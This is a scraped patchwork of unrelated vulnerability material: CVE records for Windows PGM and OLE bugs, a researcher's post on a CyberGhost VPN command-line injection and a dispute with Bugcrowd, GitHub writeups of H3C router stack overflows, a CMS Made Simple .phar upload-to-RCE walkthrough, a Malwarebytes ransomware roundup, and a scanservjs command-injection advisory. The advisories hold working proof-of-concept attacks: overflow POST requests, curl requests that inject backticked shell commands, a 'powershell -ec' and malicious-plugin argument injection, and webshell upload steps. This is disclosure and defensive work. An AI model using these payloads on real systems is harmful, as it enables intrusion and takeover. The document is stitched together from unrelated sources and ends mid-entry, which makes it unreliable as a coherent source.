**How could an attacker exploit this vulnerability?**

When Windows Message Queuing service is running in a PGM Server environment, an attacker could send a specially crafted file over the network to achieve remote code execution and attempt to trigger malicious code.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
*   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24943

Assigning CNA

Microsoft Corporation

Date Record Created

**20230131**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230131)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-24943: Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability

**Is the Preview Pane an attack vector for this vulnerability?**

Yes, the Preview Pane is an attack vector.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Windows OLE Remote Code Execution Vulnerability

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:Windows OLE Remote Code Execution Vulnerability
*   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29325

Assigning CNA

Microsoft Corporation

Date Record Created

**20230404**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230404)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-29325: Windows OLE Remote Code Execution Vulnerability

CyberGhostVPN Windows Client before v8.3.10.10015 was discovered to contain a DLL injection vulnerability via the component Dashboard.exe.

**TL;DR**

The CyberGhost VPN client suffers from an elevation of privilege vulnerability and is filed under CVE-2023-30237.  A specially crafted JSON payload sent to the CyberGhost RPC service can lead to command line injection when the OpenVPN process is launched, leading to full system compromise.  The latest 8.3.10.10015 version released on the 24 February 2023 fixes this issue.

**Hunting the hunter**

This post is as much about a recent EoP vulnerability found within the popular CyberGhost VPN client as my experiences of reporting my first vulnerability via Bugcrowd. Suffice to say, it was the worst disclosure experience I have witnessed to date.

It all started from something I experienced within the CyberGhost VPN eco system that almost ruined a 4-month Red Team operation. All disclosure paths led to Bugcrowd. So, with this in mind I thought I would give it a try. Due to the Bugcrowd T&C’s I can’t really go into much more detail than this, but what was reported was deemed a non-security issue, but a configuration change was made that altered the behaviour of what was reported, but was fixed anyway.

So, we at PTP decided to commission further dedicated research into the CyberGhost client itself. After several days of poking around, a command line injection vulnerability was found. Now some, reading this, might conclude that this was a form of retaliation. To some degree, it was, but not because of missing out on a bounty, I had no interest in that. It was more to do with how the original case was handled and how this affected an ongoing Red Team operation. Therefore, I had no intention whatsoever of reporting this new vulnerability via Bugcrowd.

The first challenge was finding a direct route to disclosure without involving Bugcrowd. Every avenue I tried came to a dead end. Online support pointed me toward Bugcrowd or CyberGhosts own disclosure submission page which was also powered by Bugcrowd. Eventually, a CyberGhost support ticket system representative sent me to \[email protected\] Kape appeared to be the developers behind several well-known consumer VPN products.

After checking the well-known security.txt from the kape.com domain, additionally I could see the \[email protected\] email in addition to the Bugcrowd VDP page. Lo and behold, sending an email to this address also resulted in an automated email response from Bugcrowd asking me to claim the submission, but not before agreeing to the T&C’s. Luckily no vulnerability details were sent and was merely a probe to determine if this was a suitable channel to use.

The next day, I did receive a follow up email from a human via the security email address. Kape highlighted that they already covered my concerns via Bugcrowd. Kape had recognised my name from the Bugcrowd report and assumed it was the same vulnerability.

After explaining to Kape that this is nothing to do with the original disclosure, they still insisted that I submit via Bugcrowd. Multiple emails later, as I was clearly getting nowhere, I decided to submit the technical details directly to the \[email protected\] email address since there were humans monitoring this mailbox too.

Now what came next amazed me.

Kape had spoken to Bugcrowd directly to ask for advice on how they should deal with out of band contact. Now instead of responding to Kape’s request, Bugcrowd decided to hand me a code of conduct point.

Here are some of the snippets from the email I received from Bugcrowd:

_We are reaching out today because we were made aware that you attempted to appeal a submission decision to the team at Kape VDP directly via email. All communication with any Program Owner should be done through the Bugcrowd platform, to ensure that if something needs to be escalated, we can be aware of it, and for our ASE team to have access to all necessary information related to the submissions._

_This type of behavior is not tolerated on the Bugcrowd platform because it violates our Code of Conduct and is a behavior explicitly prohibited in our Platform Behavior Standards as “Out of Band Contact”:_  
_We can not allow or condone unprofessional behavior, and have established a new point system to track Researchers who violate our site’s rules and Code of Conduct._

_You currently have a total of 1 point which includes this most recent incident._

Kape had mentioned that I was trying to disclose an additional vulnerability outside of the platform, Bugcrowd confirmed this, but my understanding of Bugcrowd’s T&Cs regarding Out of Band communication is related to submissions already made via the platform. Bugcrowd and their clients do not indefinitely hold any rights to future vulnerabilities that a researcher may discover.

After several rounds of communication with Bugcrowd and explaining my rationale, eventually my code of conduct point was deducted with an apology.

Once Kape could see that disclosure was not going to go through Bugcrowd, the dialogue at this point between us was more inline with what I would usually experience. We agreed a way forward, disclosure would remain private until a fix was ready, and a fix was released.

In fairness to Kape, the fix was swift in comparison with other disclosure experiences in the past. I just wish that software vendors would offer direct disclosure routes in addition to bug bounty platforms. Some researchers would prefer the direct approach.

Rant over.

**Statement from Kape / CyberGhost**

Kape’s Security Team provided the following statement in thanks for the work we performed:

“Kape values collaboration and cooperation with security researchers throughout the world, and we invest heavily in ensuring security researchers are heard and that the lines of communication with our security and development teams are always open. We are sorry that you have had this experience with us on Bugcrowd and we are following up with the relevant parties at Bugcrowd so this doesn’t happen again. At the same time, we are delighted with the research performed by Pen Test Partners into our Windows application, and thank you for your efforts to improve the cybersecurity landscape for all. Collaboration in the cybersecurity community is critical to ensure security and privacy on the internet, and we will continue to act quickly once any valid issue has been reported to us, regardless of how the issue is reported. In this spirit, we are committed to continued transparency and partnership with all researchers who are focused on responsible disclosure.”

**CVE-2023-30237**

Like many VPN providers, CyberGhost software uses solutions such as OpenVPN or Wireguard to offer VPN services to their customers.  Most of these VPN solutions are typically split across an unprivileged UI component that communicates with a privileged Windows service running as SYSTEM.  If it’s not fully scrutinized it can lead to elevation of privilege vulnerabilities via this communications channel.

When a request is made to connect to the configured city or country via the unprivileged UI, the details are sent to the backed service and eventually the OpenVPN or Wireguard process is started to establish the underlying VPN connection.

In CyberGhost’s case, this communication is done over a named pipe called **MachineNameCyberGhost8Service**, where machine name is obviously the name of the machine the service is running on.  The developers have clearly made sure that the pipe is not accessible over the network, since the NETWORK principal has a deny ACL set, therefore only local privilege escalation would be possible.

It was found that connecting to the pipe would fail if the client did not originate from the Dashboard.exe process within the CyberGhost installation folder, but this could easily be bypassed via replacing the process name inside the connecting client’s Process Environment Block structure to match that of the legitimate process, or alternatively injecting code into the legitimate Dashboard.exe directly.

Next it was time to look at the communication protocol and how it worked.  Luckily for me, both the client and service were written in .NET, so the job was far easier than a native counterpart.  The RPC communication method was JSON and looked like initially that perhaps an immediate Remote Code Execution could be possible.

As you can see from the format, the direct C# interfaces from the services are exposed and the parameters for a specific method use the often abused **$type** specifier when deserialising using **JsonSerializer** from the Newtonsoft library.  But once again, the developers had done their due diligence and **JsonSerializer** was configured correctly and prevented arbitrary .NET types from being created during JSON deserialization.

With that path exhausted, attention shifted to the callable methods themselves.  The **ConnectToVpnServer** method was the most interesting, as this was the method that led to the construction of the command line string that was fed to openvpn.exe or the wireguard DLL, depending on which method was currently configured.

This eventually let me to a class called **OpenVPN** and **CommandSanitizeHelpers**.  Once again, evidence was found where developers had put efforts in place, this time to prevent command line injection.

There are several openvpn command line arguments that can be used to execute other processes or load arbitrary DLL’s such as the **–plugin** argument.

If any of these are detected, the resulting openvpn.exe process creation is prevented.

**Inception**

Now this is where things start to get interesting.  Once the backend service constructs the monolithic command line string argument that will be used, they are parsed using the native Windows API **CommandLineToArgvW****.**  This function is responsible for breaking up a single command line string into each unique argument as an array.  Each element within the array representing a single argument.  Spaces are treated as argument delimiters unless quoted, in which case, the complete argument is the text inside the quotes.  But, if you want the API to include a double quote within an argument itself, you can escape the quote using the \\ character.  So as an example, the command line **arg1 “arg 2” “arg \\””** will be parsed into an array that looks like this.    

**arg1  
****arg 2  
****arg 3”**

Notice the parsed elements within the array do not have any quotes and have been stripped, other than what was requested with the escape sequence.

Once the CyberGhost service has broken up the individual command line arguments, each of these starting with the characters **—** are checked for the banned values.  Now the developers clearly missed some nuances of the **CommandLineToArgvW** API.

The command line **\-\\”-plugin\\” c:\\path\\malicious.dll** would result in a parsed array looking something like this

**\-“-plugin”**

**c:\\path\\malicious.dll**

Since there is a quote separating the two **—** characters, the processing rules by the CyberGhost service ignore these arguments and treat them as openvpn argument values instead of argument specifiers.  Now one would think that this is fine since openvpn would not recognise this as a valid argument, but, the majority of Windows processes also use the same **CommandLineToArgvW** API to split the command line into individual parts prior to calling the **main(int argc, char\*\*argv)** function.  Since the quote is not separated by spaces, the **CommandLineToArgVW** API call simply strips the quote out of the argument.  Therefore

**openvpn.exe -“-plugin” c:\\path\\malicious.dll**

will execute in in the same way as

**openvpn.exe –plugin c:\\path\\malicious.dll**

on Windows based platforms.

**Payload**

The final payload that is sent over the named pipe looks something like this.

You’ll notice that most of the command line injection is built into the **ServerIp** field.  This is because the **ServerIp** field is the first field that is concatenated when the command line string is being constructed.  This is then proceeded by internal command line arguments that are added such as the CA server certificate, then finally the remaining **ConnectionString** field is appended to the end.  By leveraging the **ServerIp** field, we had far more control over the final command line that was sent to openvpn.exe.  Had the developers sanitised the **ServerIp** field for a valid IP address only, I’m not sure if exploitation would have been possible.  It certainly would have been more difficult.  The final command line argument that was eventually fed to openvpn looked something like this.

**openvpn –remote “powershell -ec AAA….” –“-plugin “c:\\path\\CyberGhostPlugin.dll” –dev tap0**

The reason that the **ConnectionString** JSON property string is missing from the command line is due to the subtle fact that we embedded a null character at the end of the **ServerIp** field within the JSON payload.  This meant that even though it was concatenated in the C# code, by the time it reached the **CommandLineToArgVW** API call, the null character was treated as end of string, allowing greater control over the final generated command line since we also could exclude anything from the **ConnectionString** property.

The exploit leverages openvpn’s plugin feature to gain code execution, therefore a simple plugin was written that queried the **–remote** argument and treated this as a command to execute instead.

**Disclosure Timeline**

As you can see, the disclosure timeline is somewhat colourful:

*   **3rd January 2023** – Initial support ticket sent to CyberGhost support, eventually leading to \[email protected\] email address.
*   **4th January 2023 –** Response from Kape indicating that they already addressed concerns via Bugrowd, response sent indicating this was a new vulnerability unrelated to the original.
*   **5th – 18th January 2023 –** Several communications back and forth when attempting to get a direct line of communication.
*   **18th January 2023 –** Gave up and sent the details directly to \[email protected\] automated Bugcrowd issue capture mailbox.
*   **20th January 2023 –** Complaint email received from Bugcrowd and 1 code of conduct point awarded.
*   **20th January 2023 –** Explanation sent to Bugcrowd, leading to code of conduct point being deducted.
*   **27th January 2023 –** Further details provided regarding PoC sent on the 18th due to binaries not matching source code that was sent.
*   **31st January 2023 –** Kape now happy the source code matches the binary and working on validating the issue.
*   **1st March 2023 –** Update received from Kape indicating that they are in the process of rolling out the fix but would like to have an advance copy of the blog prior to release and would like to include a few words of appreciation within the post
*   **20th March 2023 –** Kape indicated that the fix was released on the 24th February 2023 and querying when they could receive advance copy of the blog.  
*   **27th March 2023** – Draft blog post is provided to Kape
*   **5th May 2023 –** Blog published.

CVE-2023-30237: Bullied by Bugcrowd over Kape CyberGhost disclosure

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad.

Permalink

Cannot retrieve contributors at this time

**Affected product**

    H3C GR-1200W MiniGRW1A0V100R006
    

**Firmware**

     https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4AE06C,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4AE06C(int a1)
{
  const char \*v2; // \[sp+1Ch\] \[+1Ch\]
  int v3\[8\]; // \[sp+20h\] \[+20h\] BYREF
  char v4\[64\]; // \[sp+40h\] \[+40h\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  memset(v4, 0, sizeof(v4));
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 507252736, v3);
  if ( atoi((const char \*)v3) )
  {
    if ( atoi((const char \*)v3) == 1 )
      CFG\_Set(0, 520359938, "192.168.1.251;255.255.255.0;VLAN1;2");
  }
  else
  {
    CFG\_Set(0, 520359938, v4);
  }
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=set\_tftp\_upgrad&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29693: fengsha/SetTftpUpgrad.md at main · Stevenbaga/fengsha

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function version_set.

Permalink

**Affected product**

    H3C GR-1200W  MiniGRW1A0V100R006
    

**Firmware**

    https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4ACC30,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4ACC30(int a1)
{
  const char \*v2; // \[sp+28h\] \[+28h\]
  int v3\[9\]; // \[sp+2Ch\] \[+2Ch\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 505155584, v3);
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=version\_set&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29696: fengsha/aVersionSet.md at main · Stevenbaga/fengsha

File upload vulnerability in CMS Made Simple through 2.2.15 allows remote authenticated attackers to gain a webshell via a crafted phar file.

**File upload bypass with .phar extension lead to RCE****Author: Riccardo Krauter @ Soter IT Security ****Summary**

The vulnerability affect the FilePicker module, it is possible to bypass the restriction and upload a malicious file with .phar extension to gain Remote Code Execution

**Steps to reproduce the issue**

Prepare a PoC file with .phar extension with arbitrary php code in it.

Login into the admin area and surf to the MicroTiny WYSIWYG editor functionality then click on the **insert/edit image** button. The screenshot below shows this steps.

A new window will be opened, now click on the search button, the CMSMS File Picker will be shown.

Now the FilePicker module will be used. Click on the upload button.

Select the .phar malicious file.

The file should be uploaded.

Surf to the .phar file to gain RCE.

The exploit is working because the upload handler checks only if the extension contains the php string (obviously phar does not match). The exploit works fine on a standard Ubuntu system, here the configuration used for the tests:

*   Linux ubuntu 5.4.0-58-generic
*   php version 7.4.3
*   Apache/2.4.41 (Ubuntu)
*   File Picker version = "1.0.5"

CVE-2021-28998: CVE/File_upload_to_RCE.md at master · beerpwn/CVE

LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. 



(Read more...)




The post Ransomware review: May 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim didn't pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In April, LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. Meanwhile, Cl0p, which dramatically expanded its attack operations in March, has gone quiet this month, despite Microsoft observing them exploiting PaperCut vulnerabilities.

LockBit's macOS ransomware is an interesting development in the threat landscape, showing that the group is dipping its toes into the historically ransomware-free Mac environment. The variant, targeting macOS arm64 architecture, first appeared on VirusTotal in November and December 2022 but went unnoticed until late April when it was discovered by MalwareHunterTeam. 

The LockBit macOS samples analyzed by Malwarebytes seem ineffective due to being unsigned, not accounting for TCC/SIP restrictions, and being riddled with bugs, like buffer overflows, causing premature termination when executed on macOS.

“The LockBit encryptor doesn’t look particularly viable in its current form, but I’m definitely going to be keeping an eye on it,” says Thomas Reed, director of Mac and mobile platforms at Malwarebytes. “The viability may improve in the future. Or it may not, if their tests aren’t promising.”

Keep an eye out, because LockBit's work in developing a macOS ransomware variant—plagued though it may currently be—could signal a trend toward more Mac-targeting ransomware in the future.

Known ransomware attacks by gang, April 2023

Known ransomware attacks by country, April 2023

Known ransomware attacks by industry sector, April 2023

**Cl0p** ransomware, which gained prominence in March by exploiting a zero-day vulnerability in GoAnywhere MFT, went comparatively silent with just four attacks in April. Nevertheless, the gang was seen last month exploiting vulnerabilities in PaperCut servers to steal corporate data. 

PaperCut is a popular printing management software which was targeted by both Cl0p and LockBit in April using two gnarly vulnerabilities: one allowing remote code execution (CVE-2023-27350) and the other enabling information disclosure (CVE-2023-27351). Once gaining initial access, Cl0p members sneakily deploy the TrueBot malware and a Cobalt Strike beacon to creep through the network, grabbing data along the way. 

Cl0p clearly has a history of exploiting platforms like Accellion FTA and GoAnywhere MFT, and now they've set their sights on PaperCut. So, if you're using PaperCut MF or NG, upgrade pronto and patch these two vulnerabilities!

**Vice Society**, notorious for targeting the education sector, has recently advanced their operations by adopting a sneaky PowerShell script for automated data theft. Discovered by Palo Alto Networks Unit 42, the new data exfiltration tool cleverly employs "living off the land" (LOTL) techniques to avoid detection. For instance, the script employs system-native cmdlets to search and exfiltrate data, minimizing its footprint and maintaining a low profile.

Separately, the **Play** ransomware group has whipped up two fancy .NET tools, Grixba and VSS Copying Tool, to make their cyberattacks more effective.

Grixba checks for antivirus programs, EDR suites, backup tools to help them plan the next steps of the attack. VSS Copying Tool, meanwhile, tiptoes around the Windows Volume Shadow Copy Service (VSS) to steal files from system snapshots and backup copies. Both tools were cooked up with the Costura .NET development tool for easy deployment on their victims' systems.

As Vice Society, Play, and other ransomware groups increasingly adopt advanced LOTL methods and sophisticated tools like Grixba, the capacity to proactively identify both malicious tools and the malicious use of legitimate tools within a network will undoubtedly become the deciding factor in an organization's defense strategy moving forward.

As for other trends, the USA still tops the charts as the most affected country, with the services industry getting the brunt of the attacks, as both have been the case all year. The **education sector** has its highest number of attackers (21) since January. Meanwhile, the **healthcare sector** saw a huge surge in attacks (37) in April, the highest it's been all year.

**New players****Akira**

Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files.

Like most ransomware gangs these days, the Akira gang steals corporate data before encrypting files for the purposes of double-extortion. So far, the leaked info published on their leak site—which looks retro and lets you navigate with typed commands—ranges from 5.9 GB to a whopping 259 GB.

Akira demands ransoms from $200,000 to millions of dollars, and it seems they are willing to lower ransom demands for companies that only want to prevent the leaking of stolen data without needing a decryptor.

**CrossLock**

CrossLock is a new ransomware strain using the Go programming language, which makes it more difficult to reverse engineer and boosts its compatibility across platforms. 

The ransomware employs tactics to avoid analysis, such as looking for the WINE environment (to determine if their ransomware is being executed within an analysis or sandbox environment) and tweaking Event Tracing for Windows (ETW) functions (to disrupt the flow of information that security tools and analysts rely on to identify suspicious behavior).

In April, the CrossLock Ransomware Group said they targeted Valid Certificadora, a Brazilian IT & ITES company.

**Trigona**

Trigona ransomware emerged in October 2022 and has targeted various sectors worldwide, including six in April. Operators use tools like NetScan, Splashtop, and Mimikatz to gain access, perform reconnaissance, and gather sensitive information from target systems. They also employ batch scripts to create new user accounts, disable security features, and cover their tracks. 

**Dunghill Leak**

Dunghill Leak is a new ransomware that evolved from the Dark Angels ransomware, which itself came from Babuk ransomware. In April it published the data of two companies, including Incredible Technologies, an American developer and manufacturer of coin-operated video games. The Dunghill Leak gang claims they have access to 500 GB of the company's data, including game files and tax payment reports. Researchers think Dunghill Leak is just a rebranded Dark Angels.

**Money Message**

Money Message is a new ransomware which targets both Windows and Linux systems. In April, criminals used Money Message to hit at least 10 victims, mostly in the US and from various industries. The gang also targeted some big-time companies worth billions of dollars, such as Taiwanese PC parts maker MSI (Micro-Star International).

Money Message uses advanced encryption techniques and leaves a ransom note called "money\_message.log." 

Our Ransomware Emergency Kit contains the information you need to defend against ransomware-as-a-service (RaaS) gangs.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: May 2023

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.



**Description**

Scanservjs has a RESTful API that provides endpoints for interacting with scanners using the SANE library. There are two APIs for scanning an image and generating a preview image that call out to Process.spawn, invoking a scanimage command as a subprocess of the server, and passing arguments from the API request body as arguments into the subprocess. Both APIs suffer from OS Command Injection via type confusion in several parameters in the POST body. While the business logic does sanitize string parameters from these API calls, it doesn't sufficiently prevent arrays of strings from being passed in several vulnerable POST body parameters. This allows an attacker to pass a JSON array with a single string parameter, buffeted by backticks, which gets formatted as a string and placed in the arguments for scanimage. This ultimately executes a subshell with an arbitrary command passed by the attacker, leading to remote code execution. While scanservjs has the option to enable HTTP Basic Auth, it is hidden in the config and there is no documentation on this feature, therefore this is a remote code execution without authentication by default.

**Proof of Concept****POST /scan Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/scan \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":["`cat /etc/os-release 1>&2`"],"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed"},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution `cat /etc/os-release 1>&2` -l 0 -t 0 -x 216 -y 297 --format tiff -o data/temp/~tmp-scan-0-0001.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Proof of Concept****POST /preview Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/preview \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":100,"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed", "contrast": ["`cat /etc/os-release 1>&2`"]},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution 100 -l 0 -t 0 -x 216 -y 297 --format tiff --contrast `cat /etc/os-release 1>&2` -o data/preview/preview.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Impact**

The vulnerability can execute any process on the server using a subshell, so the compromise of the system running scanservjs is almost complete. This vulnerability enables an attacker to dump the contents of any file on the server that the user, or the user's group, associated with the scanservjs process has permissions to read. Exfiltrating data can be done by using code execution in a subshell and redirecting output of a cat like command to stderr. An attacker can do more than query data using the subshell, and can run commands to write data to the server, and execute other processes outside the scope of scanservjs. In the default case, scanservjs is setup with a dedicated non root user so this user cannot read files, write files or execute commands as root. In the worst case, an administrator sets up scanservjs to run as a user with root permissions.

**Occurrences**

command-builder.js L18

The vulnerability occurs in the following code when the parameters passed from the API are formatted and sanitized. String parameters are sanitized and surrounded with single quotes but array type parameters, which can be passed to this function, are not sanitized or quoted. They are then formatted to a string when calling return `${value}`.

      /**
       * @param {string|number} [value]
       * @returns {string}
       */
      _format(value) {
        if (typeof value === 'string') {
          if (value.includes('\'')) {
            throw Error('Argument must not contain single quote "\'"');
          } else if (['$', ' ', '#', '\\', ';'].some(c => value.includes(c))) {
            return `'${value}'`;
          }
        }
        return `${value}`;
      }

CVE-2023-2564: OS Command Injection via Type Confusion in Scan and Preview Parameters in scanservjs

S-CMS v5.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the component /admin/ajax.php.

1.First download the latest version of S-CMS Enterprise Construction System Version 5.0

